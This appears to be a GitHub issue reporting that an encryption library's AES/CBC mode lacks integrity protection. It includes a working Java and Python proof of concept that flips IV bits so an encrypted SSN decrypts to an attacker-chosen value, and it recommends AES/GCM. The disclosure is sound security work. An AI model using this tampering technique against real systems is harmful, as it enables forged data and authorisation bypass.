Information about lack of integrity protection missing | Security

[niebardzo]

Hey @codesqueak,

Awesome library, but I have noticed that you do not mention anything about the usage of this library. Since the AES/CBC is used, it does not offer any integrity protection of the ciphertext like MAC (malleable). If the library is wrongly used, e.g.
someone trust it to keep the integrity of the data, it might lead to the security issue in their application.

For the simplicity, I can show the simple example when someone was encrypting Social Security Number (SSN) when serializing to JSON. The developer took the false assumption that since the value is encrypted it cannot be tampered and trusted it for authentication or authorizing some actions in the system. Now, let's say that the IV, salt and Value (cipher text) are in the control of the user/attacker (e.g. those values are encoded and stored in the Cookie for keeping user's session).
The attacker can change the IV, so that the cipher-text will be decrypted to the plain-text of the attacker's choice.

Below you can see the Java code:

        ObjectMapper objectMapper = EncryptionService.getInstance("Password1");
         // Sample Good SSN: 790714615 - attacker knows that cause he has set up the account
        String json1 = "{\"ssn\":{\"salt\":\"uzaYY1PaEpWS6SC9lUWKWw==\",\"iv\":\"6mCYbjLB2mEk1gsWRqiWiw==\",\"value\":\"JZpjE/JqkrdOi1JcGAtP9w==\"}}";
        SSNGetterPoJo pojo1 = objectMapper.readValue(json1, SSNGetterPoJo.class);
        System.out.println(pojo1.getSSN());
        // IV changed which would result in fake SSN after decryption: 111111111
        String json2 = "{\"ssn\":{\"salt\":\"uzaYY1PaEpWS6SC9lUWKWw==\",\"iv\":\"6maQbzTB32Yk0gsWRqiWiw==\",\"value\":\"JZpjE/JqkrdOi1JcGAtP9w==\"}}";
        SSNGetterPoJo pojo2 = objectMapper.readValue(json2, SSNGetterPoJo.class);
        System.out.println(pojo2.getSSN());

SSNGetterPoJo.java is almost the same as SecureGetterPojo.java

Here is the python3 code that I have used to generate the IV which changes the plain-text after decryption:

import base64

def xors(s1, s2):
    return bytes(ord(a) ^ ord(b) for a, b in zip(s1,s2))

def xorb (s1, s2):
    return bytes(a^b for a,b in zip(s1,s2))

a1 = xors("790714615", "111111111")
iv = "6mCYbjLB2mEk1gsWRqiWiw=="

b1 = base64.b64decode(iv)
new_iv = b1[0:1] + xorb(b1[1:],a1) + b1[10:]

print(base64.b64encode(new_iv))

It would be worth to mention that in the description of this library or if you want to offer the integrity protection change the cipher to the one offering MAC like AES/GCM. If you decide to change the cipher to AES/GCM, then it would be cool to create the Security Advisory and assign CVE-ID for that issue to me as the reporter.